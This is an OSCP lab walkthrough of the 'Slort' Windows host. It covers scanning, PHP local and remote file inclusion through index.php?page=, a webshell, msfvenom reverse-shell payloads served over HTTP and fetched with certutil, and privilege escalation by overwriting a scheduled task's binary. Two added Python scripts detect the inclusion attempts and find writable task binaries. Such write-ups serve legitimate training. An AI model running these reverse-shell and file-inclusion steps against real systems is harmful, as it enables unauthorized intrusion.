OSCP Lab: Slort
Key points (1. PHP remote file inclusion; 2. privilege escalation via a scheduled task)
1. nmap scan
```
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.178.53 -sV -sC -p- --min-rate 5000
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-24 04:37 EST
Nmap scan report for 192.168.178.53
Host is up (0.28s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| DNSVersionBindReqTCP, JavaRMI, LPDString, NULL:
|_ Host '192.168.45.179' is not allowed to connect to this MariaDB server
4443/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.178.53:4443/dashboard/
5040/tcp open unknown
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.178.53:8080/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.92%I=7%D=2/24%Time=65D9B8F4%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSVersio
SF:nBindReqTCP,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(
SF:LPDString,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20no
SF:t\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Ja
SF:vaRMI,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20not\x2
SF:0allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-02-24T09:40:46
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.85 seconds
```
2. User privileges
2.1 Directory scan
```
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.178.53:8080/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.178.53-8080/-_24-02-24_05-44-47.txt
Error Log: /root/.dirsearch/logs/errors-24-02-24_05-44-47.log
Target: http://192.168.178.53:8080/
[05:44:48] Starting:
[05:44:51] 403 - 1KB - /%C0%AE%C0%AE%C0%AF
[05:44:51] 403 - 1KB - /%3f/
[05:44:52] 403 - 1KB - /%ff
[05:44:59] 403 - 1KB - /.ht_wsr.txt
[05:44:59] 403 - 1KB - /.htaccess.bak1
[05:44:59] 403 - 1KB - /.htaccess.sample
[05:44:59] 403 - 1KB - /.htaccess.save
[05:44:59] 403 - 1KB - /.htaccess.orig
[05:44:59] 403 - 1KB - /.htaccess_extra
[05:44:59] 403 - 1KB - /.htaccess_orig
[05:44:59] 403 - 1KB - /.htaccess_sc
[05:44:59] 403 - 1KB - /.htaccessBAK
[05:44:59] 403 - 1KB - /.htaccessOLD
[05:44:59] 403 - 1KB - /.htaccessOLD2
[05:44:59] 403 - 1KB - /.htm
[05:44:59] 403 - 1KB - /.html
[05:44:59] 403 - 1KB - /.htpasswd_test
[05:44:59] 403 - 1KB - /.htpasswds
[05:44:59] 403 - 1KB - /.httr-oauth
[05:45:17] 403 - 1KB - /Trace.axd::$DATA
[05:45:19] 200 - 782B - /Webalizer/
[05:45:47] 403 - 1KB - /cgi-bin/
[05:45:47] 500 - 1KB - /cgi-bin/printenv.pl
[05:45:52] 301 - 351B - /dashboard -> http://192.168.178.53:8080/dashboard/
[05:45:52] 200 - 6KB - /dashboard/howto.html
[05:45:53] 200 - 31KB - /dashboard/faq.html
[05:45:53] 200 - 78KB - /dashboard/phpinfo.php
[05:45:59] 403 - 1KB - /error/
[05:46:01] 200 - 30KB - /favicon.ico
[05:46:02] 503 - 1KB - /examples
[05:46:02] 503 - 1KB - /examples/
[05:46:02] 503 - 1KB - /examples/servlet/SnoopServlet
[05:46:02] 503 - 1KB - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[05:46:02] 503 - 1KB - /examples/jsp/snp/snoop.jsp
[05:46:02] 503 - 1KB - /examples/servlets/servlet/CookieExample
[05:46:02] 503 - 1KB - /examples/servlets/index.html
[05:46:02] 503 - 1KB - /examples/servlets/servlet/RequestHeaderExample
[05:46:06] 301 - 345B - /img -> http://192.168.178.53:8080/img/
[05:46:07] 302 - 0B - /index.php -> http://192.168.178.53:8080/dashboard/
[05:46:07] 302 - 0B - /index.pHp -> http://192.168.178.53:8080/dashboard/
[05:46:07] 302 - 0B - /index.php/login/ -> http://192.168.178.53:8080/dashboard/
[05:46:07] 302 - 0B - /index.php. -> http://192.168.178.53:8080/dashboard/
[05:46:07] 403 - 1KB - /index.php::$DATA
[05:46:21] 403 - 1KB - /phpmyadmin/ChangeLog
[05:46:21] 403 - 1KB - /phpmyadmin/doc/html/index.html
[05:46:21] 403 - 1KB - /phpmyadmin/docs/html/index.html
[05:46:21] 403 - 1KB - /phpmyadmin/README
[05:46:22] 403 - 1KB - /phpmyadmin
[05:46:24] 403 - 1KB - /phpmyadmin/
[05:46:24] 403 - 1KB - /phpmyadmin/index.php
[05:46:24] 403 - 1KB - /phpmyadmin/phpmyadmin/index.php
[05:46:24] 403 - 1KB - /phpmyadmin/scripts/setup.php
[05:46:31] 403 - 1KB - /server-status/
[05:46:31] 403 - 1KB - /server-status
[05:46:31] 403 - 1KB - /server-info
[05:46:33] 301 - 346B - /site -> http://192.168.178.53:8080/site/
[05:46:34] 301 - 27B - /site/ -> index.php?page=main.php
[05:46:46] 403 - 1KB - /web.config::$DATA
[05:46:46] 403 - 1KB - /webalizer
[05:46:49] 200 - 774B - /xampp/
Task Completed
```
2.2 PHP LFI vulnerability found:
Including the phpinfo.php file:
2.3 PHP RFI vulnerability found:
2.4 Using the RFI to obtain a webshell:
PHP webshell (bind-style, not reverse) URL: https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php
2.5 Moving to an interactive shell
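The `index.php?page=` parameter behind `/site/` is the sink that both the LFI and the RFI above go through. As an added example (not part of the original writeup), the following Python script shows the defender's side of the same issue: it parses Apache access-log lines, extracts the `page` parameter and classifies each value as a plain relative include, a local traversal, a remote URL, or a PHP stream wrapper. The log lines are constructed for this example; the parameter name `page` comes from the dirsearch redirect, and the classification rules are this example's own, not anything the lab host runs.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache access-log lines (common log format) against /site/index.php?page=.
# These are made up for the example, not captured traffic from the lab.
SAMPLE_LOG = """\
192.168.45.179 - - [24/Feb/2024:05:46:34 -0500] "GET /site/index.php?page=main.php HTTP/1.1" 200 1543
192.168.45.179 - - [24/Feb/2024:05:50:02 -0500] "GET /site/index.php?page=../../dashboard/phpinfo.php HTTP/1.1" 200 79881
192.168.45.179 - - [24/Feb/2024:05:52:11 -0500] "GET /site/index.php?page=http://192.168.45.179/webshell.php HTTP/1.1" 200 2211
192.168.45.179 - - [24/Feb/2024:05:53:40 -0500] "GET /site/index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 3011
192.168.45.179 - - [24/Feb/2024:05:55:00 -0500] "GET /dashboard/ HTTP/1.1" 200 7232
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# PHP stream wrappers that an include() sink should never see from user input.
STREAM_WRAPPERS = ("php://", "data:", "expect://", "phar://", "zip://", "glob://", "file://", "compress.")


def classify_include_value(value):
    """Classify a value destined for include(): 'ok', 'lfi', 'rfi' or 'wrapper'."""
    v = unquote(unquote(value))  # peel single and double URL-encoding
    low = v.lower()
    if low.startswith(STREAM_WRAPPERS):
        return "wrapper"
    # Any URL scheme, protocol-relative URL or UNC path means a remote include.
    if re.match(r"^[a-z][a-z0-9+.\-]*://", low) or low.startswith(("//", "\\\\")):
        return "rfi"
    # Traversal, null bytes, absolute POSIX paths or Windows drive paths mean a local include.
    if ".." in v or "\x00" in v or v.startswith(("/", "\\")) or re.match(r"^[a-z]:[\\/]", low):
        return "lfi"
    return "ok"


def scan_log(text, param="page"):
    """Return one finding per request whose `param` value is not a plain relative file name."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            kind = classify_include_value(value)
            if kind != "ok":
                findings.append({"ip": m.group("ip"), "ts": m.group("ts"), "kind": kind,
                                 "value": value, "status": int(m.group("status"))})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['kind'].upper():7} status={f['status']} page={f['value']}")
```

Run it against a real `access.log` by reading the file into `scan_log`. A 200 status on an `rfi` or `wrapper` finding is the signal worth paging on: it means the include actually resolved, which is exactly what happened on this box. The server-side fix is the usual one, an allowlist of page names mapped to files, rather than trying to block patterns.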
```
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o shell443.exe
```
```
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80
```
## Upload shell443.exe through the webshell
## Run shell443.exe
```
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443
```
## local.txt
```
c:\Users\rupert\Desktop>type local.txt
type local.txt
345738c06042482d447a067226c9bfa7
```
3. Root privileges
3.1 winpeas.exe:
```
File: C:\xampp\phpMyAdmin\config.inc.php
```
3.2 A scheduled task is found:
3.3 Overwriting the scheduled task's binary to escalate privileges:
```
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o TFTP.EXE
```
```
c:\Backup>certutil -urlcache -split -f http://192.168.45.179/TFTP.EXE
```
```
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443
```
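The escalation in 3.3 works only because the executable the scheduled task runs, `C:\Backup\TFTP.EXE`, can be replaced by the low-privileged user while the task itself runs with higher rights. As an added example (not part of the original writeup), the following Python script performs the matching defender check offline: it parses `schtasks /query /fo LIST /v` output to find each task's executable, reads `icacls` output collected for that executable, and reports tasks whose binary is writable by Everyone, BUILTIN\Users, Authenticated Users or INTERACTIVE. Both command outputs are constructed samples; the task name `\Backup`, its run-as account, and the `%windir%` expansion are assumptions of this example, not facts from the lab.

```python
import re

# Constructed sample of `schtasks /query /fo LIST /v` output, trimmed to the fields this check
# reads. The C:\Backup\TFTP.EXE path comes from the writeup; the task name and the run-as
# account are assumptions for the example.
SCHTASKS_SAMPLE = """\
HostName:                             SLORT
TaskName:                             \\Backup
Task To Run:                          C:\\Backup\\TFTP.EXE
Run As User:                          Administrator
Schedule Type:                        Minute

HostName:                             SLORT
TaskName:                             \\Microsoft\\Windows\\Defrag\\ScheduledDefrag
Task To Run:                          %windir%\\system32\\defrag.exe -c -h -o -$
Run As User:                          SYSTEM
Schedule Type:                        Weekly
"""

# Constructed `icacls <path>` output for each executable, keyed by the path icacls was run on.
ICACLS_SAMPLE = {
    r"C:\Backup\TFTP.EXE": (
        "C:\\Backup\\TFTP.EXE BUILTIN\\Users:(F)\n"
        "                   NT AUTHORITY\\SYSTEM:(F)\n"
        "                   BUILTIN\\Administrators:(F)\n"
        "\nSuccessfully processed 1 files; Failed processing 0 files\n"
    ),
    r"C:\Windows\system32\defrag.exe": (
        "C:\\Windows\\system32\\defrag.exe NT SERVICE\\TrustedInstaller:(F)\n"
        "                                BUILTIN\\Administrators:(RX)\n"
        "                                NT AUTHORITY\\SYSTEM:(RX)\n"
        "                                BUILTIN\\Users:(RX)\n"
        "\nSuccessfully processed 1 files; Failed processing 0 files\n"
    ),
}

ENV = {"%windir%": r"C:\Windows", "%systemroot%": r"C:\Windows"}  # assumed expansions
LOW_PRIV = {"everyone", r"builtin\users", r"nt authority\authenticated users", r"nt authority\interactive"}
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO", "D"}  # icacls rights that allow modification


def parse_schtasks(text):
    """Split LIST/verbose output into one dict of 'Field: value' pairs per task."""
    tasks = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            m = re.match(r"^([^:]+):\s+(.*)$", line)
            if m:
                fields[m.group(1).strip()] = m.group(2).strip()
        if "Task To Run" in fields:
            tasks.append(fields)
    return tasks


def binary_path(command):
    """Extract the executable from a 'Task To Run' value, honouring quotes and known variables."""
    command = command.strip()
    if command.startswith('"'):
        exe = command[1:command.index('"', 1)]
    else:
        exe = command.split(" ", 1)[0]
    for var, value in ENV.items():
        if exe.lower().startswith(var):
            exe = value + exe[len(var):]
    return exe


def parse_icacls(path, text):
    """Return [(principal, {rights}), ...] from `icacls <path>` output; DENY entries are skipped."""
    aces = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Successfully"):
            continue
        if line.lower().startswith(path.lower()):  # first line carries the path prefix
            line = line[len(path):].strip()
        m = re.match(r"^(.+?):((?:\([^)]*\))+)$", line)
        if not m:
            continue
        groups = re.findall(r"\(([^)]*)\)", m.group(2))
        if "DENY" in groups:
            continue
        rights = {r.strip().upper() for g in groups for r in g.split(",")}
        aces.append((m.group(1).strip(), rights))
    return aces


def is_privileged(run_as):
    r = run_as.strip().lower()
    return r in {"system", r"nt authority\system", "localsystem"} or "admin" in r


def find_hijackable_tasks(schtasks_text, icacls_outputs):
    """Report tasks whose executable a low-privileged principal can modify."""
    findings = []
    for task in parse_schtasks(schtasks_text):
        exe = binary_path(task["Task To Run"])
        acl_text = next((t for p, t in icacls_outputs.items() if p.lower() == exe.lower()), None)
        if acl_text is None:
            continue
        writers = [p for p, rights in parse_icacls(exe, acl_text)
                   if p.lower() in LOW_PRIV and rights & WRITE_RIGHTS]
        if writers:
            findings.append({"task": task.get("TaskName"), "exe": exe,
                             "run_as": task.get("Run As User", ""),
                             "privileged": is_privileged(task.get("Run As User", "")),
                             "writable_by": writers})
    return findings


if __name__ == "__main__":
    for f in find_hijackable_tasks(SCHTASKS_SAMPLE, ICACLS_SAMPLE):
        print(f)
```

On a real host, feed it `schtasks /query /fo LIST /v` saved to a file and one `icacls <exe>` capture per executable. Check the ACL of the containing directory as well, since a file that a user can delete and recreate is as hijackable as one they can write; a finding with `privileged` true is the case this box demonstrates, and the fix is to keep task binaries in a location only administrators can modify.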
4. Summary
## Key points:
### 1. Remote file inclusion
### 2. Privilege escalation via a scheduled task